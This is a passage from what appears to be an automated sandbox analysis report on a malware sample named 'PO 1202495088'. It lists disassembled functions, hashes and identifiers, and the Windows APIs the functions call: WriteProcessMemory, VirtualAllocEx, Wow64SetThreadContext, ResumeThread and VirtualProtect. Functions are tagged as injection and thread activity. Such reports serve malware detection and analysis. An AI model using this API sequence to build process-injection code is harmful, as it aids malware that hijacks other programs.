                                                                                          • Opcode Fuzzy Hash: 15bd95f1f0965f16f3f746055c0b165366a1e27cac7820921ff19d65b63eadda
                                                                                          • Instruction Fuzzy Hash: 11C116B0D0021E8FDB20CFA8C841BEDBBB1BF49300F4495AAD919B7250DB749A85CF95
                                                                                          Function 075F78D9 Relevance: 1.6, APIs: 1, Instructions: 122injectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 488 75f78d9-75f794b 491 75f794d-75f795f 488->491 492 75f7962-75f79c9 WriteProcessMemory 488->492 491->492 494 75f79cb-75f79d1 492->494 495 75f79d2-75f7a24 492->495 494->495
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075F79B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: ad1742fa21c81b56437d3e9ad684f29651a37e55623e9b8265612349c1c8f0ad
                                                                                          • Instruction ID: c6821506bd4044512d67b58234acdbed3342344e876fed433306e70b357f9047
                                                                                          • Opcode Fuzzy Hash: ad1742fa21c81b56437d3e9ad684f29651a37e55623e9b8265612349c1c8f0ad
                                                                                          • Instruction Fuzzy Hash: F641BCB5D012489FCF00CFA9D984AEEFBF1BB49310F10942AE818B7240D735AA45CF64
                                                                                          Function 075F78E0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 500 75f78e0-75f794b 502 75f794d-75f795f 500->502 503 75f7962-75f79c9 WriteProcessMemory 500->503 502->503 505 75f79cb-75f79d1 503->505 506 75f79d2-75f7a24 503->506 505->506
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075F79B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: e1249d1d5474b3f9e1ed54d2d1fbd1e18522432073f7b040e99dc7e2c2584d6e
                                                                                          • Instruction ID: 7cf55b168626c8456c2e3f8aa47eb1918978d135ddb9e81030bef7a7b62bc3d9
                                                                                          • Opcode Fuzzy Hash: e1249d1d5474b3f9e1ed54d2d1fbd1e18522432073f7b040e99dc7e2c2584d6e
                                                                                          • Instruction Fuzzy Hash: 5C41BCB4D012589FCF00CFA9D984AEEFBF1BB49310F20942AE818B7200D774AA45CF64
                                                                                          Function 075F77B0 Relevance: 1.6, APIs: 1, Instructions: 117memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 511 75f77b0-75f77b4 512 75f77b6-75f782e 511->512 513 75f7775-75f7786 511->513 516 75f7835-75f7878 VirtualAllocEx 512->516 513->511 517 75f787a-75f7880 516->517 518 75f7881-75f78cb 516->518 517->518
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075F7862
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 19ac664f8f050eeb7afe5991d3cf56cad5862044d5ed92cd7c4a7ade5ba11b47
                                                                                          • Instruction ID: 8604fc9c25ebac3f319452309d1e1f99727df482cf1b11e00a2ee459387a1bb3
                                                                                          • Opcode Fuzzy Hash: 19ac664f8f050eeb7afe5991d3cf56cad5862044d5ed92cd7c4a7ade5ba11b47
                                                                                          • Instruction Fuzzy Hash: 0241CDB8D042489FCF10CFA9E880ADEFBB5FB0A310F10945AE814B7200D735A906CFA5
                                                                                          Function 075F7A38 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 523 75f7a38-75f7b08 ReadProcessMemory 527 75f7b0a-75f7b10 523->527 528 75f7b11-75f7b63 523->528 527->528
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075F7AF2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: 54ac00de0b54824a3eae13f9d428131865e7623784523aed3fa8d532533834d3
                                                                                          • Instruction ID: 59f81bb0dbb4261ea83312f14f62be245a739cd0fa009d7885a26c5ac3cc795b
                                                                                          • Opcode Fuzzy Hash: 54ac00de0b54824a3eae13f9d428131865e7623784523aed3fa8d532533834d3
                                                                                          • Instruction Fuzzy Hash: 0341A8B5D002589FCF10CFAAD881AEEFBB5BB59310F20942AE815B7240D775A945CFA4
                                                                                          Function 075F7A40 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 533 75f7a40-75f7b08 ReadProcessMemory 536 75f7b0a-75f7b10 533->536 537 75f7b11-75f7b63 533->537 536->537
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075F7AF2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: d165340377e2a99d9bff6f2e85c35d687d0956e3adb9eae8beea2a5c6bc8f906
                                                                                          • Instruction ID: 2d45df6216314ede272fb78c2417978a9de4cd580bf57151716889be2aff26c9
                                                                                          • Opcode Fuzzy Hash: d165340377e2a99d9bff6f2e85c35d687d0956e3adb9eae8beea2a5c6bc8f906
                                                                                          • Instruction Fuzzy Hash: AA41A7B9D002589FCF10CFAAD880AEEFBB5BF59310F14942AE814B7200D775A945CF68
                                                                                          Function 075F77B8 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 542 75f77b8-75f7878 VirtualAllocEx 545 75f787a-75f7880 542->545 546 75f7881-75f78cb 542->546 545->546
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075F7862
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 7987fea5a5243e70885875de33b7b49be6d89342ed32667c6bea3cd4e5407c81
                                                                                          • Instruction ID: 9f4405af2f004d8c0978fb3b59379b5ae6f6430eb972bd1a8f5c14c2603aa631
                                                                                          • Opcode Fuzzy Hash: 7987fea5a5243e70885875de33b7b49be6d89342ed32667c6bea3cd4e5407c81
                                                                                          • Instruction Fuzzy Hash: D74179B5D002589BCF14CFA9D980ADEBBB5BB59310F10942AE815B7300D775A946CFA4
                                                                                          Function 075F724A Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 075F72FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 9c59133f2b865dc48b552860b3e93377b4d14746c45b8dedccfd9f3190ab38e6
                                                                                          • Instruction ID: cee343fdfbd0c7251164adb326e3e5d47926675dc8e2d83b6d64c14d094b60c1
                                                                                          • Opcode Fuzzy Hash: 9c59133f2b865dc48b552860b3e93377b4d14746c45b8dedccfd9f3190ab38e6
                                                                                          • Instruction Fuzzy Hash: B441CCB4D002589FCB14CFAAD884AEEFBF5BB49314F24842AE818B7240D779A945CF54
                                                                                          Function 030EADFB Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 030EAEA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 35803d3081b7140d262497fecc451d5cdb477b8887465a333344c088dd792671
                                                                                          • Instruction ID: 090f90f1ee77459a1eedafed2ad46e7396cca9019fbb1f244d20267e91b3d091
                                                                                          • Opcode Fuzzy Hash: 35803d3081b7140d262497fecc451d5cdb477b8887465a333344c088dd792671
                                                                                          • Instruction Fuzzy Hash: 4E318BB5D002589FCF10CFA9D884ADEFBB5BB59310F24945AE814B7310D375A945CF64
                                                                                          Function 030EAE00 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 030EAEA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: d80058ba7b2741535707cd5047f51384aa154f98653ffe067764036ee7d8538b
                                                                                          • Instruction ID: 9b04ad9e4893ca1c8199030ffbaf92e735795df14c23c8a6b903e66303dd5710
                                                                                          • Opcode Fuzzy Hash: d80058ba7b2741535707cd5047f51384aa154f98653ffe067764036ee7d8538b
                                                                                          • Instruction Fuzzy Hash: F23189B9D002589FCF10CFAAD884ADEFBB5BB59310F24946AE814B7310D375A945CF64
                                                                                          Function 075F7250 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 075F72FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: a83547a40f4d8f1f591d1fb2e255cd3a85521baaf1c1408dcb7a43be46712dc9
                                                                                          • Instruction ID: 86d65e40a3b468cee8c9abc10d24a19272cc828c6dca04a2c358a6f6f1ad7160
                                                                                          • Opcode Fuzzy Hash: a83547a40f4d8f1f591d1fb2e255cd3a85521baaf1c1408dcb7a43be46712dc9
                                                                                          • Instruction Fuzzy Hash: 2341CBB4D002589FCB10CFAAD884AEEFBF1BF49314F24842AE818B7240D779A945CF54
                                                                                          Function 075F7160 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 075F71DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 4d8e9cb9ba28293516f7041438a60b83e86a24db10ddcdcf1f6af795173958a4
                                                                                          • Instruction ID: be6089280ffddf9acfb7513cb3fc0c6a8e0cbb4b7c7f702ca1a0e6ce73ae5b0d
                                                                                          • Opcode Fuzzy Hash: 4d8e9cb9ba28293516f7041438a60b83e86a24db10ddcdcf1f6af795173958a4
                                                                                          • Instruction Fuzzy Hash: DB31BAB4D002189FCB14CFAAE880AEEFBB5FB49314F14942AE818B7300D735A945CF94
                                                                                          Function 0189D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113406119.000000000189D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0189D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_189d000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 19bcfd46e537de7796a9f40bf17d57030568c94da51d77689bbf071cef6c3e18
                                                                                          • Instruction ID: c67d42000fc173ea6142a8c80df9d5b9935c7437391b8471943635c06c015f4c
                                                                                          • Opcode Fuzzy Hash: 19bcfd46e537de7796a9f40bf17d57030568c94da51d77689bbf071cef6c3e18
                                                                                          • Instruction Fuzzy Hash: 31213A71504244EFDF01DF58D9C0B6ABF65FB88324F28C669E9098F246C33AE556CBA1
                                                                                          Function 018AD01C Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113465543.00000000018AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018AD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_18ad000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b26b956c9c41e47a93e9f4dbf6d255374c93c667eb7795593bd6c437bfc1b2f
                                                                                          • Instruction ID: d99e6934ba39fa75795be5fe7cdd1fefbe3e7866c457ecd240320f6d9f1e399e
                                                                                          • Opcode Fuzzy Hash: 5b26b956c9c41e47a93e9f4dbf6d255374c93c667eb7795593bd6c437bfc1b2f
                                                                                          • Instruction Fuzzy Hash: 46212271644244EFEB11DF68D8C0B26BBA5EB88314F64CA69E809CB642C33AD507CA61
                                                                                          Function 018AD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113465543.00000000018AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018AD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_18ad000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1c2eff64e5906a23d458f4f77450b89e38cd35db3d7a5719de9d1f5504510951
                                                                                          • Instruction ID: dc466eabb47eb86805f0997788c5b7071f899103ca0cb5d970bacc2e2bd6f284
                                                                                          • Opcode Fuzzy Hash: 1c2eff64e5906a23d458f4f77450b89e38cd35db3d7a5719de9d1f5504510951
                                                                                          • Instruction Fuzzy Hash: F0210775504244EFEB01DF98D5C0B26BBA5FB88324F64CA6DE809CB652C33AE546CA61
                                                                                          Function 018AD006 Relevance: .1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113465543.00000000018AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018AD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_18ad000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: efa746d022d01fcbb265808fd1fcc23d184bb234d8a14618b0aa7e3ccde2b6b2
                                                                                          • Instruction ID: 184bf489bedc6d485caef2af4d48196674246783909f3684e3096013552952cf
                                                                                          • Opcode Fuzzy Hash: efa746d022d01fcbb265808fd1fcc23d184bb234d8a14618b0aa7e3ccde2b6b2
                                                                                          • Instruction Fuzzy Hash: 3D21B3754483809FDB03CF64D994711BF71EB46314F28C5DAD8498F6A7C33A9906CB62
                                                                                          Function 0189D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113406119.000000000189D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0189D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_189d000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4972d1d434fddefbb1b9e0a5b9f67a78b03546657ae4b17f3d062d0453858cc1
                                                                                          • Instruction ID: b2d87d55ad0aa7277bacda1f330e052de64c0a4e4c5c3b731ae2fafe75d7291a
                                                                                          • Opcode Fuzzy Hash: 4972d1d434fddefbb1b9e0a5b9f67a78b03546657ae4b17f3d062d0453858cc1
                                                                                          • Instruction Fuzzy Hash: A711DF72404280DFDF12CF44D5C0B5ABF71FB84320F28C6A9D8094B656C33AE55ACBA1
                                                                                          Function 018AD1CF Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113465543.00000000018AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018AD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_18ad000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f771905618cf57e4c02493273645ecb55f0bf3fd05410e58dd0286626d49624f
                                                                                          • Instruction ID: 3f585c264c81dde0f248eea4d6d76b681932dc853c257b05afcd629b6ec5c4c8
                                                                                          • Opcode Fuzzy Hash: f771905618cf57e4c02493273645ecb55f0bf3fd05410e58dd0286626d49624f
                                                                                          • Instruction Fuzzy Hash: B7118E75904280DFEB12CF54D5C4B15BB71FB84324F24C6AAD8498B666C33AE54ACB51

                                                                                          Non-executed Functions

                                                                                          Function 030ED6F8 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: {#L
                                                                                          • API String ID: 0-1361971085
                                                                                          • Opcode ID: 9d1b2236dfa192a863c190ddb3512e0a4a0b532939aa29414959d5c4db1f70c4
                                                                                          • Instruction ID: 3a16448b2c04b18513056a5feee57fd2cb4027a274c2bcf17ece707c684c3d29
                                                                                          • Opcode Fuzzy Hash: 9d1b2236dfa192a863c190ddb3512e0a4a0b532939aa29414959d5c4db1f70c4
                                                                                          • Instruction Fuzzy Hash: 43E1E375E15219DFCB18CFAAD98059EFBF2FF88300B14D52AD459AB268E7349902CF14
                                                                                          Function 030E6C50 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: l|
                                                                                          • API String ID: 0-1955549514
                                                                                          • Opcode ID: 14669ab087842807d2e9b7733ca6120e0183ac9d412854f3aaec1a27df4a554b
                                                                                          • Instruction ID: 43dd46e7503b3b08c55b8dd20230dca2f6548a99351bf535e713256ab5352d51
                                                                                          • Opcode Fuzzy Hash: 14669ab087842807d2e9b7733ca6120e0183ac9d412854f3aaec1a27df4a554b
                                                                                          • Instruction Fuzzy Hash: B3716C74E0621D9FCB04CF99D5904AEFBB2FFA9300F14D9A9C416AB254D735AA41CF50
                                                                                          Function 030E4B48 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 98R
                                                                                          • API String ID: 0-576591972
                                                                                          • Opcode ID: 86b5a0fd5865eb1c490522273fa8e90790b4a8705568c5a6e18d4edcf2b502a9
                                                                                          • Instruction ID: 703815da8040ddf784f008188fe6ee21786fe0e78f485abd94c38f072dca929a
                                                                                          • Opcode Fuzzy Hash: 86b5a0fd5865eb1c490522273fa8e90790b4a8705568c5a6e18d4edcf2b502a9
                                                                                          • Instruction Fuzzy Hash: 1F712A74E0620ADFCB44CFAAD480AEEFBB2FB88310F148429D415AB354D3749A41CF94
                                                                                          Function 030EC023 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: w7e^
                                                                                          • API String ID: 0-1657886525
                                                                                          • Opcode ID: 069994422da2a0df95c922d93ca697f10e9ee8c38ec55ecc54e94971f3f7d193
                                                                                          • Instruction ID: 07fee59c1558551921de1b6d6c887156f2003bae46848bd88ed53754a2fb5cfe
                                                                                          • Opcode Fuzzy Hash: 069994422da2a0df95c922d93ca697f10e9ee8c38ec55ecc54e94971f3f7d193
                                                                                          • Instruction Fuzzy Hash: C94137B2E05259DFEB08CFAAC8406EEFBB1FB89201F14996AC415B7244D33946428F59
                                                                                          Function 030EC030 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: w7e^
                                                                                          • API String ID: 0-1657886525
                                                                                          • Opcode ID: 7168b50e4fc1406ac4a0d79780509db6e7f5d820dfdce5545e29740c1eaf9b1d
                                                                                          • Instruction ID: c49c476f201e444aff7838cd540d1edd10f1f160f22047c5d15c93302be8dae5
                                                                                          • Opcode Fuzzy Hash: 7168b50e4fc1406ac4a0d79780509db6e7f5d820dfdce5545e29740c1eaf9b1d
                                                                                          • Instruction Fuzzy Hash: F441F7B5E06219DFDF08CFAAC9406EEFBB1FB89201F14996AC416B7254D3394642CF58
                                                                                          Function 030E86B8 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0ni
                                                                                          • API String ID: 0-1488673370
                                                                                          • Opcode ID: d44e13c3577c25c3ed3ed173e849121b503c1e3bd5f81b69a92cd8c36f5e6559
                                                                                          • Instruction ID: 422e5bb7b5dfd19c699d0086eef25ce4a16d4c7bd2af6405fcb944c362a0748a
                                                                                          • Opcode Fuzzy Hash: d44e13c3577c25c3ed3ed173e849121b503c1e3bd5f81b69a92cd8c36f5e6559
                                                                                          • Instruction Fuzzy Hash: 08514A71E056588BEB68CF6B994579EFBF3AFC9300F14C1BAD50CA6264DB300A858F51
                                                                                          Function 030E203B Relevance: .5, Instructions: 499COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e6957ae63e09b64c58e45b7fba3f8eefaa09a7040d6fd69a52e838f0b066c5e0
                                                                                          • Instruction ID: 22cc83cd227f74b154d0fc41f8beab4194c1ca10a98df8f10ed6cbc9d3750eb4
                                                                                          • Opcode Fuzzy Hash: e6957ae63e09b64c58e45b7fba3f8eefaa09a7040d6fd69a52e838f0b066c5e0
                                                                                          • Instruction Fuzzy Hash: A132F2B5E012198FDB14DFA9C880AEEFBF6FF88300F1485A9D559A7244DB345A85CF90
                                                                                          Function 075F7380 Relevance: .3, Instructions: 312COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6420f96662e933c2fbe7fe04ee7c2a3eccf8493b18251d64df1bbd3798486970
                                                                                          • Instruction ID: fa800e02d3a3e1ae893e2d9313910c5d2255929b5068e2bbd55679b5f9b345ce
                                                                                          • Opcode Fuzzy Hash: 6420f96662e933c2fbe7fe04ee7c2a3eccf8493b18251d64df1bbd3798486970
                                                                                          • Instruction Fuzzy Hash: 88E1F6B4E002198FCB14DFA9C5809AEFBB2FF89314F648569E515AB355DB30A942CF60
                                                                                          Function 075F6070 Relevance: .3, Instructions: 312COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ff4f7934f48a39d58e831d585f5b5dfc0fcdb8cd24693c5c337341bc5f14c9b
                                                                                          • Instruction ID: 4e680e806bcc06426fef19c6c2aad18a801bdebb3b0906cad0efbfa413707883
                                                                                          • Opcode Fuzzy Hash: 5ff4f7934f48a39d58e831d585f5b5dfc0fcdb8cd24693c5c337341bc5f14c9b
                                                                                          • Instruction Fuzzy Hash: F3E1FAB4E001198FCB14DFA9C5849AEFBB2FF89304F248169D515AB356DB31AD42CFA1
                                                                                          Function 075F4C68 Relevance: .3, Instructions: 312COMMON
